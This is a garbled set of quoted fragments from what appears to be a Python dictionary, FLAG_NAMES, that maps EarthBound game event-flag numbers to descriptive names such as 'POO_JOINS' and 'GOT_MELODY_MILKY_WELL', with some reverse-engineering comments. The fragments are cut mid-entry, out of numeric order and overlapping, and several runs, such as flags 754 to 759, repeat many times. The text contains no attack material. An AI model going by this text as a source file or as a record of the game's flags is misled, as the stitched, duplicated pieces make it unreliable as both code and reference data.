'GOT_SATURN_RIBBON',", "403: 'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409:", "531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536: 'RUNAWAY_FIVE_FREE_MUSIC', 537:", "220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', #", "756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for NPCs", "responsible only for palette changes, maybe) 435: 'GUARDIAN_GENERAL_DEFEATED', 436: 'SEA_OF_EDEN_KRAKEN_1_DEFEATED', 437: 'SEA_OF_EDEN_KRAKEN_2_DEFEATED', 438:", "316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER',", "'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484: 'PHOTO_CHAOS_THEATER_AVAILABLE', 485: 'PHOTO_LAKE_TESS_AVAILABLE',", "172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set when you receive", "458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA', 460: 'MONKEY_CAVE_HAMBURGER_3', 461: 'MONKEY_CAVE_FRESH_EGG', 462: 'MONKEY_CAVE_RULER', 463: 'TALKED_TO_FRESH_EGG_GIVING_MONKEY', 464:", "Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', # 150 (Related to Poo's journey) 151: 'QUEST_TO_SUBMARINE',", "754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', #", "(???) 466: 'PICKY_SLEEPING_AT_METEORITE', # 467 (Unknown. Related to Ness's house door knocking?) 468:", "103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text 104: 'POKEY_PUNISHED', 105: 'PATH_TO_TWOSON_OPEN', # 106", "706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712:", "287 (Something about Lake Tess color palette) 288: 'USED_HAWK_EYE', 289: 'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED',", "751: 'CHAOS_THEATER_AUDIENCE_ABSENT', 752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757:", "# 625 (Something about \"Fancy Pokey\" in the Monotoli Building) -- Got kicked", "# 771 (???) 772: 'LAST_DAD_CALL', 773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT', # Visibility flags for NPCs #457", "'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746: 'SCAM_HOUSE_UNLOCKED', # 747", "377 (???) # 378 (???) 379: 'ANDONUTS_AT_LAB_ABSENT', # 380 (???) # 381 (???)", "'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD',", "'GUARDIAN_HIEROGLYPH_1_DEFEATED', # The first Hieroglyph Guardian doesn't reference this flag and never fights", "'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER',", "(Unknown. Set after Apple Kid calls you about the Gourmet Yogurt Machine) #", "631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT', 633: 'LIERS_HOUSE_UNLOCKED', 634: 'PAULA_TELEPATHY_DREAM_1', 635: 'PAULA_TELEPATHY_DREAM_2', 636: 'PAULA_TELEPATHY_DREAM_JEFF', 637:", "Related to Ness's house door knocking?) 468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471:", "'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20: 'PICKY_IN_PARTY', 21: 'POKEY_IN_PARTY', 22: 'BUBBLE_MONKEY_IN_PARTY',", "TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594: 'BLOND_GUY_IN_FOURSIDE', # TODO: CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596", "# 161 (???) # 162 (???) # 163 (???) # 164 (???) 165:", "'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE',", "Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149:", "'GOT_PHASE_DISTORTER_HORN_OF_LIFE', 224: 'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227", "shyness book\"? This flag is set even if you don't talk to Apple", "685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA', 690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER', 691:", "411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417:", "573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579:", "talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1', 128: 'JEFF_STARTS_HIS_JOURNEY', 129: 'TESSIE_EMERGES', 130: 'TALKED_TO_ANDONUTS_2', 131:", "755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag", "flag is set even if you don't talk to Apple Kid 127: 'TALKED_TO_ANDONUTS_1',", "'ONETT_COP_1_DEFEATED', 290: 'ONETT_COP_2_DEFEATED', 291: 'ONETT_COP_3_DEFEATED', 292: 'ONETT_COP_4_DEFEATED', 293: 'ONETT_COP_5_DEFEATED', 294: 'APPLE_MOUSE_BLOCKING_DOOR', 295: 'NESS_HOUSE_DOOR_KNOCKING',", "217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221: 'UNUSED_BRAIN_FOOD_LUNCH', 222: 'UNUSED_REFRESHING_HERB', 223:", "'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707: 'GOT_PHOTO_GRAPEFRUIT_FALLS', 708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT',", "475 (Handles continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP', 477: 'NESS_SLEEPING_AT_HIS_BED', 478:", "'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631: 'TALKED_TO_MOONSIDE_MONOTOLI', 632: 'MONSTERS_IN_ONETT',", "141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at Fourside", "after Apple Kid calls you about the Gourmet Yogurt Machine) # 377 (???)", "'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED',", "740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE', 744: 'TALKED_TO_CARPAINTER', 745: 'QUEST_TO_YOGURT_MACHINE', 746:", "\"can search for shyness book\"? This flag is set even if you don't", "CONFIRM 595: 'STAR_MASTER_NEXT_TO_MU', # 596 (???) 597: 'SHOP_SCARABA_BAZAAR_FOOD', 598: 'SHOP_SCARABA_WATER', 599: 'SHOP_SOUTH_SCARABA_VARIETY', 600:", "'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758: 'GOING_TO_MAGICANT_MUSIC', 759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA', # Visibility flag for", "'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE', 185: 'GOT_MELODY_MILKY_WELL',", "'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', #", "# 376 (Unknown. Set after Apple Kid calls you about the Gourmet Yogurt", "'MONKEY_CAVE_SKIP_SANDWICH', 452: 'MONKEY_CAVE_PICNIC_LUNCH', 453: 'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1',", "'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED',", "NPCs #457 and #459 774: 'TALKED_TO_MOONSIDE_SAILOR_MAN', # 775 (Can't get calls from Dad?)", "52: 'CAPTIVES_AT_STONEHENGE', 53: 'TALKED_TO_BRICK_ROAD', # 54 (Montague at beginning of expanded mine?) #", "'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP', 266: 'SHOP_SUMMERS_RESTAURANT', 267: 'SHOP_TOTO_SHOP', 268: 'SHOP_SUMMERS_GELATO', 269: 'SHOP_MAGIC_CAKE_LADY',", "multipurpose flags) # 229 (I hate multipurpose flags) # 230 (I hate multipurpose", "'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER',", "'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS', 263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER', 264: 'SHOP_FOURSIDE_PUNK_GUY', 265: 'SHOP_SUMMERS_SHOP',", "'MONKEY_CAVE_WET_TOWEL', 454: 'MONKEY_CAVE_PIZZA_1', 455: 'MONKEY_CAVE_PROTEIN_DRINK', 456: 'MONKEY_CAVE_PIZZA_2', 457: 'MONKEY_CAVE_HAMBURGER_1', 458: 'MONKEY_CAVE_HAMBURGER_2', 459: 'MONKEY_CAVE_KING_BANANA',", "'GUARDIAN_MOLE_1_DEFEATED', 278: 'GUARDIAN_MOLE_2_DEFEATED', 279: 'GUARDIAN_MOLE_3_DEFEATED', 280: 'GUARDIAN_MOLE_4_DEFEATED', 281: 'GUARDIAN_MOLE_5_DEFEATED', # 282 (Five moles", "'SHOP_GRAPEFRUIT_FALLS', 248: 'SHOP_SATURN_EQUIPMENT', 249: 'SHOP_SATURN_PENDANTS', 250: 'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE',", "779 (Related to PREVENT_TELEPORT?) # 780 (If set, Maxwell doesn't actually save your", "136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH',", "to Boogey Tent) 374: 'TOPOLLA_THEATER_BACKSTAGE_UNBLOCKED', 375: 'PEOPLE_IN_ONETT', # 376 (Unknown. Set after Apple", "614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn.", "'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT', 665: 'GOT_LETTER_FROM_MOM', 666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN',", "'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1', 425: 'TENDA_SHOP_PLAIN_YOGURT',", "Pokey\" in the Monotoli Building) -- Got kicked out of Pokey's Room in", "384: 'GOT_ALL_MELODIES', 385: 'GOT_CONTACT_LENS', 386: 'MOONSIDE_ENRAGED_FIRE_PLUG_DEFEATED', # Unused, there's no NPC attached to", "559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565:", "134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', #", "'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414: 'LETHAL_ASP_HIEROGLYPH_8_DEFEATED', 415: 'LETHAL_ASP_HIEROGLYPH_9_DEFEATED', 416: 'BRICK_ROAD_DUNGEON_DUCK_1_DEFEATED', 417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED',", "'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT', 257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES', 258: 'SHOP_FOURSIDE_DEPT_BAKERY', 259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS', 260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS', 261: 'SHOP_FOURSIDE_DEPT_BURGER', 262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS',", "'TEMP_10', 11: 'ENEMY_SUPPRESS', 12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS',", "715: 'GOT_PHOTO_MONOTOLI_BUILDING', 716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE', 717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721:", "'TALKED_TO_ANDONUTS_2', 131: 'WATERFALL_WAIT_ENABLED', 132: 'QUEST_TO_ZEXONYTE', 133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED',", "468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE', 470: 'TALKED_TO_TRACY_AT_HER_ROOM', 471: 'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474:", "you about the Gourmet Yogurt Machine) # 377 (???) # 378 (???) 379:", "'APPLE_KID_IN_BURGLIN_PARK', 43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE', 44: 'POKEY_OUTSIDE_HH_HQ', 45: 'POKEY_OUTSIDE_PAULA_CABIN', 46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL', 47: 'BROKEN_SKYRUNNER_THREED', 48: 'FIXED_SKYRUNNER_THREED',", "320 (???) # 321 (Something about Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME',", "13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19:", "37: 'ALOYSIUS_AT_HOME', 38: 'FIVE_COPS_AT_POLICE_STATION', 39: 'COP_AT_STATION_ENTRANCE', 40: 'SHARK_GUARDING_FRANK_DEFEATED', 41: 'CHAOS_THEATER_STAGE_UNBLOCKED', 42: 'APPLE_KID_IN_BURGLIN_PARK', 43:", "'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE',", "537: 'TESSIE_MUSIC', # 538 (???) 539: 'GIVEN_PLAYERS_NAME', # 540 (???) 541: 'OPENED_THREED_CEMETERY_UNDREGROUND_DOOR', 542:", "'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE',", "'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD',", "FLAG_NAMES = { 1: 'TEMP_1', 2: 'TEMP_2', 3: 'TEMP_3', 4: 'TEMP_4', 5: 'TEMP_5',", "'FLYING_MAN_5_JOINS', 30: 'POKEY_JOINS', 31: 'LIER_INSIDE_HOUSE', 32: 'LIER_INSIDE_CAVE_1', 33: 'LIER_INSIDE_CAVE_2', 34: 'PICKY_AT_HIS_ROOM', 35: 'POKEY_AT_HIS_ROOM',", "'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320 (???) # 321 (Something about Paula's", "'EVERDRED_NOT_AT_ROOF', 613: 'TELEPORT_MONKEY_NOT_AT_CAVE', 614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE', 615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER',", "'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184: 'GOT_MELODY_RAINY_CIRCLE',", "(???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) # 287 (Something about Lake", "Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER', # 320", "752: 'HINT_GUY_ABSENT', 753: 'NESS_HOUSE_PHONE_RINGING', 754: 'PREVENT_TELEPORT', 755: 'GOT_INSIGNIFICANT_ITEM', 756: 'DUNGEON_MAN_IN_PARTY', 757: 'GEORGE_HAS_DIAMOND', 758:", "734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740:", "'PHOTO_BLACK_SESAME_SEED_AVAILABLE', 492: 'PHOTO_DESERT_MINE_AVAILABLE', 493: 'PHOTO_FOURSIDE_BRIDGE_AVAILABLE', 494: 'PHOTO_FOURSIDE_MUSEUM_OUTSIDE_AVAILABLE', 495: 'PHOTO_FOURSIDE_MUSEUM_INSIDE_AVAILABLE', 496: 'PHOTO_MONOTOLI_BUILDING_AVAILABLE', 497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE',", "'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME',", "Monotoli Building? 626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT', 627: 'TRACY_HAS_SOUND_STONE', 628: 'PRESENTS_AT_SATURN_VALLEY', 629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT', 630: 'BUBBLE_MONKEY_AT_LAKE_TESS', 631:", "from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???) #", "'HIDE_THREED_HOTEL_TOWN_MAP', # 572 (???) 573: 'HIDE_THREED_BAKERY_TOWN_MAP', 574: 'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577:", "553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557: 'READY_TO_SAIL_TO_SCARABA', 558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559:", "'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT', 142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR', 143: 'FOURSIDE_FREE_FROM_MONOTOLI', # 144 (Related to Bulldozer at", "296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room 297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room 298:", "551: 'GAVE_FOOD_TO_APPLE_KID', 552: 'GOT_ZOMBIE_PAPER', 553: 'GOT_BACKSTAGE_PASS', 554: 'GOT_YOGURT_DISPENSER', 555: 'FOURSIDE_DEPT_LIGHTS_OUT', 556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED', 557:", "'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 'GOT_MAGIC_TRUFFLE_5', 444: 'KING_JOINS', 445: 'TALKED_TO_BRICK_ROADS_HEAD', 446: 'FOR_SALE_SIGN_CUSTOMER_1',", "438: 'SEA_OF_EDEN_KRAKEN_3_DEFEATED', 439: 'GOT_MAGIC_TRUFFLE_1', 440: 'GOT_MAGIC_TRUFFLE_2', 441: 'GOT_MAGIC_TRUFFLE_3', 442: 'GOT_MAGIC_TRUFFLE_4', 443: 